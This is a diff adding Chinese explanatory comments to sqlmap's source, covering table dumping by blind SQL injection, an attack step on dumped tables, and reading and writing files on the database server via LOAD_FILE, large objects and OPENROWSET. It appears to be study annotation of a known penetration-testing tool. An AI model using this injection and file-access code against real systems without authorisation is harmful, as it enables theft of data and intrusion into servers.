if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA): if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA):
table = tbl table = tbl
@ -339,7 +392,7 @@ class Entries(object):
table = "%s.%s" % (conf.db, tbl) if conf.db else tbl table = "%s.%s" % (conf.db, tbl) if conf.db else tbl
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
table = "%s:%s" % (conf.db, tbl) if conf.db else tbl table = "%s:%s" % (conf.db, tbl) if conf.db else tbl
# 如果是mssql并且没有强制透视
if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
warnMsg = "in case of table dumping problems (e.g. column entry order) " warnMsg = "in case of table dumping problems (e.g. column entry order) "
warnMsg += "you are advised to rerun with '--force-pivoting'" warnMsg += "you are advised to rerun with '--force-pivoting'"
@ -369,7 +422,7 @@ class Entries(object):
clearConsoleLine() clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase" warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg) logger.warning(warnMsg)
# 如果没有获取到条目,且没有检测到键盘中断
if not entries and not kb.dumpKeyboardInterrupt: if not entries and not kb.dumpKeyboardInterrupt:
try: try:
retVal = pivotDumpTable(table, colList, count, blind=True) retVal = pivotDumpTable(table, colList, count, blind=True)
@ -382,12 +435,12 @@ class Entries(object):
if retVal: if retVal:
entries, lengths = retVal entries, lengths = retVal
# 对于其他数据库
else: else:
emptyColumns = [] emptyColumns = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne)
# 如果列的数量小于行数,且大于阈值,则进行空列检查
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
debugMsg = "checking for empty columns" debugMsg = "checking for empty columns"
logger.debug(infoMsg) logger.debug(infoMsg)
@ -409,7 +462,7 @@ class Entries(object):
if column not in entries: if column not in entries:
entries[column] = BigArray() entries[column] = BigArray()
# 根据不同的数据库类型,构建盲注查询语句
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
@ -428,10 +481,10 @@ class Entries(object):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index) query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index)
query = agent.whereQuery(query) query = agent.whereQuery(query)
# 执行盲注查询,获取值
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
value = '' if value is None else value value = '' if value is None else value
# 更新最大长度和条目值
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
entries[column].append(value) entries[column].append(value)
@ -440,14 +493,15 @@ class Entries(object):
clearConsoleLine() clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase" warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg) logger.warning(warnMsg)
# 遍历获取到的条目将结果保存到kb.data.dumpedTable中
for column, columnEntries in entries.items(): for column, columnEntries in entries.items():
length = max(lengths[column], len(column)) length = max(lengths[column], len(column))
kb.data.dumpedTable[column] = {"length": length, "values": columnEntries} kb.data.dumpedTable[column] = {"length": length, "values": columnEntries}
# 获取总行数
entriesCount = len(columnEntries) entriesCount = len(columnEntries)
# 如果没有转储表数据或者条目数为0且有权限标识
if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag):
warnMsg = "unable to retrieve the entries " warnMsg = "unable to retrieve the entries "
if conf.col: if conf.col:
@ -456,15 +510,18 @@ class Entries(object):
warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "")
logger.warning(warnMsg) logger.warning(warnMsg)
else: else:
# 保存转储的信息,包括总行数、表名和数据库名
kb.data.dumpedTable["__infos__"] = {"count": entriesCount, kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
"table": safeSQLIdentificatorNaming(tbl, True), "table": safeSQLIdentificatorNaming(tbl, True),
"db": safeSQLIdentificatorNaming(conf.db)} "db": safeSQLIdentificatorNaming(conf.db)}
try: try:
# 对转储的数据进行攻击
attackDumpedTable() attackDumpedTable()
except (IOError, OSError) as ex: except (IOError, OSError) as ex:
errMsg = "an error occurred while attacking " errMsg = "an error occurred while attacking "
errMsg += "table dump ('%s')" % getSafeExString(ex) errMsg += "table dump ('%s')" % getSafeExString(ex)
logger.critical(errMsg) logger.critical(errMsg)
# 将转储的数据传递给dumper
conf.dumper.dbTableValues(kb.data.dumpedTable) conf.dumper.dbTableValues(kb.data.dumpedTable)
except SqlmapConnectionException as ex: except SqlmapConnectionException as ex:
@ -473,14 +530,17 @@ class Entries(object):
logger.critical(errMsg) logger.critical(errMsg)
finally: finally:
# 清空全局变量
kb.dumpColumns = None kb.dumpColumns = None
kb.dumpTable = None kb.dumpTable = None
# 定义dumpAll方法用于转储所有数据库中的所有表的所有条目
def dumpAll(self): def dumpAll(self):
# 如果指定了数据库,但没有指定表,则只转储该数据库下的表
if conf.db is not None and conf.tbl is None: if conf.db is not None and conf.tbl is None:
self.dumpTable() self.dumpTable()
return return
# 如果是MySQL数据库且没有information_schema
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
errMsg = "information_schema not available, " errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0" errMsg += "back-end DBMS is MySQL < 5.0"
@ -489,15 +549,19 @@ class Entries(object):
infoMsg = "sqlmap will dump entries of all tables from all databases now" infoMsg = "sqlmap will dump entries of all tables from all databases now"
logger.info(infoMsg) logger.info(infoMsg)
# 清空表和列的全局变量
conf.tbl = None conf.tbl = None
conf.col = None conf.col = None
# 获取所有表
self.getTables() self.getTables()
# 如果有缓存的表信息
if kb.data.cachedTables: if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list): if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = {None: kb.data.cachedTables} kb.data.cachedTables = {None: kb.data.cachedTables}
# 遍历数据库和表
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
conf.db = db conf.db = db
@ -506,7 +570,6 @@ class Entries(object):
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg) logger.info(infoMsg)
continue continue
try: try:
conf.tbl = table conf.tbl = table
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
@ -517,45 +580,57 @@ class Entries(object):
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg) logger.info(infoMsg)
# 定义dumpFoundColumn方法用于转储已发现的列
def dumpFoundColumn(self, dbs, foundCols, colConsider): def dumpFoundColumn(self, dbs, foundCols, colConsider):
message = "do you want to dump found column(s) entries? [Y/n] " message = "do you want to dump found column(s) entries? [Y/n] "
# 询问用户是否要转储已发现的列
if not readInput(message, default='Y', boolean=True): if not readInput(message, default='Y', boolean=True):
return return
dumpFromDbs = [] dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n" message = "which database(s)?\
[a]ll (default)\
"
# 构建数据库选项
for db, tblData in dbs.items(): for db, tblData in dbs.items():
if tblData: if tblData:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[%s]\
" % unsafeSQLIdentificatorNaming(db)
message += "[q]uit" message += "[q]uit"
# 接收用户选择
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 处理用户选择
if not choice or choice in ('a', 'A'): if not choice or choice in ('a', 'A'):
dumpFromDbs = list(dbs.keys()) dumpFromDbs = list(dbs.keys())
elif choice in ('q', 'Q'): elif choice in ('q', 'Q'):
return return
else: else:
dumpFromDbs = choice.replace(" ", "").split(',') dumpFromDbs = choice.replace(" ", "").split(',')
# 遍历数据库
for db, tblData in dbs.items(): for db, tblData in dbs.items():
if db not in dumpFromDbs or not tblData: if db not in dumpFromDbs or not tblData:
continue continue
conf.db = db conf.db = db
dumpFromTbls = [] dumpFromTbls = []
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) message = "which table(s) of database '%s'?\
message += "[a]ll (default)\n" " % unsafeSQLIdentificatorNaming(db)
message += "[a]ll (default)\
"
# 构建表选项
for tbl in tblData: for tbl in tblData:
message += "[%s]\n" % tbl message += "[%s]\
" % tbl
message += "[s]kip\n" message += "[s]kip\
"
message += "[q]uit" message += "[q]uit"
# 接收用户选择
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 处理用户选择
if not choice or choice in ('a', 'A'): if not choice or choice in ('a', 'A'):
dumpFromTbls = tblData dumpFromTbls = tblData
elif choice in ('s', 'S'): elif choice in ('s', 'S'):
@ -564,80 +639,120 @@ class Entries(object):
return return
else: else:
dumpFromTbls = choice.replace(" ", "").split(',') dumpFromTbls = choice.replace(" ", "").split(',')
# 遍历表
for table, columns in tblData.items(): for table, columns in tblData.items():
if table not in dumpFromTbls: if table not in dumpFromTbls:
continue continue
conf.tbl = table conf.tbl = table
colList = [_ for _ in columns if _] colList = [_ for _ in columns if _]
# 如果指定了排除模式,则排除匹配的列
if conf.exclude: if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
# 设置需要转储的列
conf.col = ','.join(colList) conf.col = ','.join(colList)
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
data = self.dumpTable(dbs) data = self.dumpTable(dbs)
# 如果成功转储了数据则传递给dumper
if data: if data:
conf.dumper.dbTableValues(data) conf.dumper.dbTableValues(data)
def dumpFoundTables(self, tables): def dumpFoundTables(self, tables):
# 1. 定义一个消息,询问用户是否要转储发现的表条目
message = "do you want to dump found table(s) entries? [Y/n] " message = "do you want to dump found table(s) entries? [Y/n] "
# 2. 使用 readInput 函数获取用户输入,默认值为 'Y' (是),并将其转换为布尔值
# 如果用户输入 'n' (否) 或者其他非 'y' 的值,则返回 False否则返回 True。
# 如果用户输入为否,则直接返回,不进行后续的转储操作
if not readInput(message, default='Y', boolean=True): if not readInput(message, default='Y', boolean=True):
return return
# 3. 初始化一个空列表 dumpFromDbs用于存储用户选择要转储的数据库
dumpFromDbs = [] dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n" # 4. 构建一个消息,用于提示用户选择要转储的数据库,其中 [a]ll (default) 表示默认选择全部数据库
message = "which database(s)?\
[a]ll (default)\
"
# 5. 遍历传入的 tables 字典,该字典的键是数据库名,值是该数据库下的表列表
for db, tablesList in tables.items(): for db, tablesList in tables.items():
# 6. 如果该数据库有表,则将数据库名添加到消息中,并进行安全 SQL 标识符命名处理
if tablesList: if tablesList:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[%s]\
" % unsafeSQLIdentificatorNaming(db)
# 7. 在消息中添加一个选项 [q]uit允许用户退出
message += "[q]uit" message += "[q]uit"
# 8. 使用 readInput 函数获取用户输入,默认值为 'a',表示选择全部数据库
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 9. 如果用户没有输入或者输入为 'a' (或 'A'),则将所有数据库添加到 dumpFromDbs 列表中
if not choice or choice.lower() == 'a': if not choice or choice.lower() == 'a':
dumpFromDbs = list(tables.keys()) dumpFromDbs = list(tables.keys())
# 10. 如果用户输入为 'q' (或 'Q'),则直接返回,不进行后续的转储操作
elif choice.lower() == 'q': elif choice.lower() == 'q':
return return
# 11. 否则,将用户输入的数据库名按逗号分割,并添加到 dumpFromDbs 列表中
else: else:
dumpFromDbs = choice.replace(" ", "").split(',') dumpFromDbs = choice.replace(" ", "").split(',')
# 12. 遍历 tables 字典,键是数据库名,值是该数据库下的表列表
for db, tablesList in tables.items(): for db, tablesList in tables.items():
# 13. 如果当前数据库不在 dumpFromDbs 列表中,或者当前数据库没有表,则跳过该数据库
if db not in dumpFromDbs or not tablesList: if db not in dumpFromDbs or not tablesList:
continue continue
# 14. 将当前数据库名赋值给 conf.db (全局配置参数)
conf.db = db conf.db = db
# 15. 初始化一个空列表 dumpFromTbls用于存储用户选择要转储的表
dumpFromTbls = [] dumpFromTbls = []
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) # 16. 构建一个消息,用于提示用户选择当前数据库下要转储的表
message += "[a]ll (default)\n" message = "which table(s) of database '%s'?\
" % unsafeSQLIdentificatorNaming(db)
# 17. 在消息中添加一个选项 [a]ll (default),表示默认选择全部表
message += "[a]ll (default)\
"
# 18. 遍历当前数据库下的表列表,将表名添加到消息中,并进行安全 SQL 标识符命名处理
for tbl in tablesList: for tbl in tablesList:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl) message += "[%s]\
" % unsafeSQLIdentificatorNaming(tbl)
message += "[s]kip\n" # 19. 在消息中添加一个选项 [s]kip允许用户跳过当前数据库的表
message += "[s]kip\
"
# 20. 在消息中添加一个选项 [q]uit允许用户退出
message += "[q]uit" message += "[q]uit"
# 21. 使用 readInput 函数获取用户输入,默认值为 'a',表示选择全部表
choice = readInput(message, default='a') choice = readInput(message, default='a')
# 22. 如果用户没有输入或者输入为 'a' (或 'A'),则将所有表添加到 dumpFromTbls 列表中
if not choice or choice.lower() == 'a': if not choice or choice.lower() == 'a':
dumpFromTbls = tablesList dumpFromTbls = tablesList
# 23. 如果用户输入为 's' (或 'S'),则跳过当前数据库的表,继续处理下一个数据库
elif choice.lower() == 's': elif choice.lower() == 's':
continue continue
# 24. 如果用户输入为 'q' (或 'Q'),则直接返回,不进行后续的转储操作
elif choice.lower() == 'q': elif choice.lower() == 'q':
return return
# 25. 否则,将用户输入的表名按逗号分割,并添加到 dumpFromTbls 列表中
else: else:
dumpFromTbls = choice.replace(" ", "").split(',') dumpFromTbls = choice.replace(" ", "").split(',')
# 26. 遍历 dumpFromTbls 列表,该列表存储当前数据库下要转储的表名
for table in dumpFromTbls: for table in dumpFromTbls:
# 27. 将当前表名赋值给 conf.tbl (全局配置参数)
conf.tbl = table conf.tbl = table
# 28. 清空 kb.data.cachedColumns (全局配置参数) 缓存的列信息
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
# 29. 清空 kb.data.dumpedTable (全局配置参数) 缓存的表数据
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
# 30. 调用 self.dumpTable() 函数,转储当前表的数据
data = self.dumpTable() data = self.dumpTable()
# 31. 如果转储成功 (data 不为空),则将转储的数据传递给 conf.dumper.dbTableValues() 函数进行后续处理
if data: if data:
conf.dumper.dbTableValues(data) conf.dumper.dbTableValues(data)

@ -5,320 +5,496 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import codecs import codecs # 用于处理不同编码的文本
import os import os # 用于与操作系统进行交互
import sys import sys # 用于访问与系统相关的参数和函数
from lib.core.agent import agent from lib.core.agent import agent # 导入 agent 模块,用于与数据库进行交互
from lib.core.common import Backend from lib.core.common import Backend # 导入 Backend 模块,用于获取数据库信息
from lib.core.common import checkFile from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import dataToOutFile from lib.core.common import dataToOutFile # 导入 dataToOutFile 函数,用于将数据写入文件
from lib.core.common import decloakToTemp from lib.core.common import decloakToTemp # 导入 decloakToTemp 函数,用于将伪装的文件名转换为临时文件路径
from lib.core.common import decodeDbmsHexValue from lib.core.common import decodeDbmsHexValue # 导入 decodeDbmsHexValue 函数,用于解码数据库的十六进制数据
from lib.core.common import isListLike from lib.core.common import isListLike # 导入 isListLike 函数,用于检查是否为列表类型
from lib.core.common import isNumPosStrValue from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查是否为正数字符串
from lib.core.common import isStackingAvailable from lib.core.common import isStackingAvailable # 导入 isStackingAvailable 函数,用于检查是否支持堆叠查询
from lib.core.common import isTechniqueAvailable from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查是否支持某种注入技术
from lib.core.common import readInput from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.compat import xrange from lib.core.compat import xrange # 导入 xrange 函数,用于生成数字序列
from lib.core.convert import encodeBase64 from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于进行 Base64 编码
from lib.core.convert import encodeHex from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于进行十六进制编码
from lib.core.convert import getText from lib.core.convert import getText # 导入 getText 函数,用于将数据转换为文本
from lib.core.convert import getUnicode from lib.core.convert import getUnicode # 导入 getUnicode 函数,用于将数据转换为 Unicode
from lib.core.data import conf from lib.core.data import conf # 导入 conf 模块,用于获取全局配置信息
from lib.core.data import kb from lib.core.data import kb # 导入 kb 模块,用于获取全局知识库信息
from lib.core.data import logger from lib.core.data import logger # 导入 logger 模块,用于打印日志信息
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,用于指定字符集类型
from lib.core.enums import DBMS from lib.core.enums import DBMS # 导入 DBMS 枚举,用于指定数据库类型
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,用于指定预期的数据类型
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,用于指定攻击载荷类型
from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod # 导入 SqlmapUndefinedMethod 异常,用于处理未定义的方法
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING # 导入 UNICODE_ENCODING 变量,用于指定 Unicode 编码
from lib.request import inject from lib.request import inject # 导入 inject 模块,用于进行 SQL 注入
class Filesystem(object): class Filesystem(object):
""" """
This class defines generic OS file system functionalities for plugins. 这个类定义了插件的通用操作系统文件系统功能
""" """
def __init__(self): def __init__(self):
self.fileTblName = "%sfile" % conf.tablePrefix # 初始化文件表名
self.tblField = "data" self.fileTblName = "%sfile" % conf.tablePrefix # 将配置中的表前缀与 "file" 组合,生成表名
# 初始化表字段名
self.tblField = "data" # 设置表字段名为 "data"
def _checkFileLength(self, localFile, remoteFile, fileRead=False): def _checkFileLength(self, localFile, remoteFile, fileRead=False):
"""
检查本地文件和远程文件长度是否相同
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileRead (bool, optional): 是否为读取文件操作. Defaults to False.
Returns:
bool: 如果文件长度相同返回 True否则返回 False如果无法判断则返回 None
"""
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile # 如果是 MySQL 数据库
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile # 构建获取远程文件长度的 SQL 查询
elif Backend.isDbms(DBMS.PGSQL) and not fileRead: elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid # 如果是 PostgreSQL 数据库且不是读取文件操作
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid # 构建获取大对象长度的 SQL 查询
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") # 如果是 MSSQL 数据库
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") # 创建支持表
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) # 使用 OPENROWSET 将文件内容插入表中
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) # 构建获取表数据长度的 SQL 查询
try: try:
localFileSize = os.path.getsize(localFile) localFileSize = os.path.getsize(localFile) # 获取本地文件大小
except OSError: except OSError:
warnMsg = "file '%s' is missing" % localFile # 如果本地文件不存在
logger.warning(warnMsg) warnMsg = "file '%s' is missing" % localFile # 构造警告消息
localFileSize = 0 logger.warning(warnMsg) # 打印警告信息
localFileSize = 0 # 将本地文件大小设置为 0
if fileRead and Backend.isDbms(DBMS.PGSQL): if fileRead and Backend.isDbms(DBMS.PGSQL):
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) # 如果是读取文件操作且是 PostgreSQL 数据库
sameFile = True logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) # 打印信息,表示 PostgreSQL 无法检查读取文件长度
sameFile = True # 将 sameFile 设置为 True
else: else:
logger.debug("checking the length of the remote file '%s'" % remoteFile) # 如果不是读取文件或者不是 PostgreSQL 数据库
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) logger.debug("checking the length of the remote file '%s'" % remoteFile) # 打印调试信息,表示正在检查远程文件长度
sameFile = None remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取远程文件大小
sameFile = None # 将 sameFile 初始化为 None
if isNumPosStrValue(remoteFileSize): if isNumPosStrValue(remoteFileSize):
remoteFileSize = int(remoteFileSize) # 如果远程文件大小为有效的数字字符串
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) remoteFileSize = int(remoteFileSize) # 将远程文件大小转换为整数
sameFile = False localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) # 将本地文件路径转换为 Unicode
sameFile = False # 将 sameFile 设置为 False
if localFileSize == remoteFileSize: if localFileSize == remoteFileSize:
sameFile = True # 如果本地文件大小和远程文件大小相同
infoMsg = "the local file '%s' and the remote file " % localFile sameFile = True # 将 sameFile 设置为 True
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) infoMsg = "the local file '%s' and the remote file " % localFile # 构造信息消息
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) # 将远程文件路径和文件大小添加到信息消息中
elif remoteFileSize > localFileSize: elif remoteFileSize > localFileSize:
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) # 如果远程文件大小大于本地文件大小
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) # 构造信息消息
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) # 将本地文件路径和文件大小添加到信息消息中
else: else:
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) # 如果远程文件大小小于本地文件大小
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) # 构造信息消息
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) # 将本地文件路径和文件大小添加到信息消息中
logger.info(infoMsg) logger.info(infoMsg) # 打印信息消息
else: else:
sameFile = False # 如果远程文件大小不是有效的数字字符串
warnMsg = "it looks like the file has not been written (usually " sameFile = False # 将 sameFile 设置为 False
warnMsg += "occurs if the DBMS process user has no write " warnMsg = "it looks like the file has not been written (usually " # 构造警告消息
warnMsg += "privileges in the destination path)" warnMsg += "occurs if the DBMS process user has no write " # 警告消息补充
logger.warning(warnMsg) warnMsg += "privileges in the destination path)" # 警告消息补充
logger.warning(warnMsg) # 打印警告消息
return sameFile return sameFile # 返回文件长度检查结果
def fileToSqlQueries(self, fcEncodedList): def fileToSqlQueries(self, fcEncodedList):
""" """
Called by MySQL and PostgreSQL plugins to write a file on the 将编码后的文件内容转换为 SQL 查询语句用于 MySQL PostgreSQL
back-end DBMS underlying file system
""" Args:
fcEncodedList (list): 编码后的文件内容列表
counter = 0 Returns:
sqlQueries = [] list: SQL 查询语句列表
"""
counter = 0 # 初始化计数器
sqlQueries = [] # 初始化 SQL 查询语句列表
for fcEncodedLine in fcEncodedList: for fcEncodedLine in fcEncodedList: # 遍历编码后的文件内容列表
if counter == 0: if counter == 0:
# 如果是第一个编码行
sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine)) sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
# 将带有编码数据的插入语句添加到 SQL 查询列表中
else: else:
# 如果不是第一个编码行
updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine) updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
# 构建更新语句,将编码行添加到数据字段中
sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField)) sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))
# 将更新语句添加到 SQL 查询列表中
counter += 1 counter += 1 # 计数器加 1
return sqlQueries return sqlQueries # 返回 SQL 查询语句列表
def fileEncode(self, fileName, encoding, single, chunkSize=256): def fileEncode(self, fileName, encoding, single, chunkSize=256):
""" """
Called by MySQL and PostgreSQL plugins to write a file on the 读取文件内容并进行编码
back-end DBMS underlying file system
""" Args:
fileName (str): 文件路径
encoding (str): 编码方式例如 "hex""base64" 或其他编码
single (bool): 是否将所有内容编码为单行
chunkSize (int, optional): 分块大小. Defaults to 256.
checkFile(fileName) Returns:
list: 编码后的文件内容列表
"""
checkFile(fileName) # 检查文件是否存在
with open(fileName, "rb") as f: with open(fileName, "rb") as f:
content = f.read() # 打开文件进行读取
content = f.read() # 读取文件内容
return self.fileContentEncode(content, encoding, single, chunkSize) return self.fileContentEncode(content, encoding, single, chunkSize) # 返回编码后的文件内容
def fileContentEncode(self, content, encoding, single, chunkSize=256): def fileContentEncode(self, content, encoding, single, chunkSize=256):
retVal = [] """
对文件内容进行编码
Args:
content (bytes): 文件内容
encoding (str): 编码方式例如 "hex""base64" 或其他编码
single (bool): 是否将所有内容编码为单行
chunkSize (int, optional): 分块大小. Defaults to 256.
Returns:
list: 编码后的文件内容列表
"""
retVal = [] # 初始化返回列表
if encoding == "hex": if encoding == "hex":
content = encodeHex(content) # 如果编码方式为 "hex"
content = encodeHex(content) # 将文件内容进行十六进制编码
elif encoding == "base64": elif encoding == "base64":
content = encodeBase64(content) # 如果编码方式为 "base64"
content = encodeBase64(content) # 将文件内容进行 Base64 编码
else: else:
content = codecs.encode(content, encoding) # 如果编码方式不是 "hex" 或 "base64"
content = codecs.encode(content, encoding) # 使用指定的编码方式进行编码
content = getText(content).replace("\n", "") content = getText(content).replace("\
", "") # 将编码后的内容转换为文本,并删除换行符
if not single: if not single:
# 如果不是单行编码
if len(content) > chunkSize: if len(content) > chunkSize:
# 如果内容长度大于分块大小
for i in xrange(0, len(content), chunkSize): for i in xrange(0, len(content), chunkSize):
_ = content[i:i + chunkSize] # 按照分块大小进行分块
_ = content[i:i + chunkSize] # 获取当前分块
if encoding == "hex": if encoding == "hex":
_ = "0x%s" % _ # 如果编码方式为 "hex"
_ = "0x%s" % _ # 添加十六进制前缀
elif encoding == "base64": elif encoding == "base64":
_ = "'%s'" % _ # 如果编码方式为 "base64"
_ = "'%s'" % _ # 添加单引号
retVal.append(_) retVal.append(_) # 将当前分块添加到返回列表中
if not retVal: if not retVal:
# 如果返回列表为空
if encoding == "hex": if encoding == "hex":
content = "0x%s" % content # 如果编码方式为 "hex"
content = "0x%s" % content # 添加十六进制前缀
elif encoding == "base64": elif encoding == "base64":
content = "'%s'" % content # 如果编码方式为 "base64"
content = "'%s'" % content # 添加单引号
retVal = [content] retVal = [content] # 将编码后的内容添加到返回列表中
return retVal return retVal # 返回编码后的文件内容列表
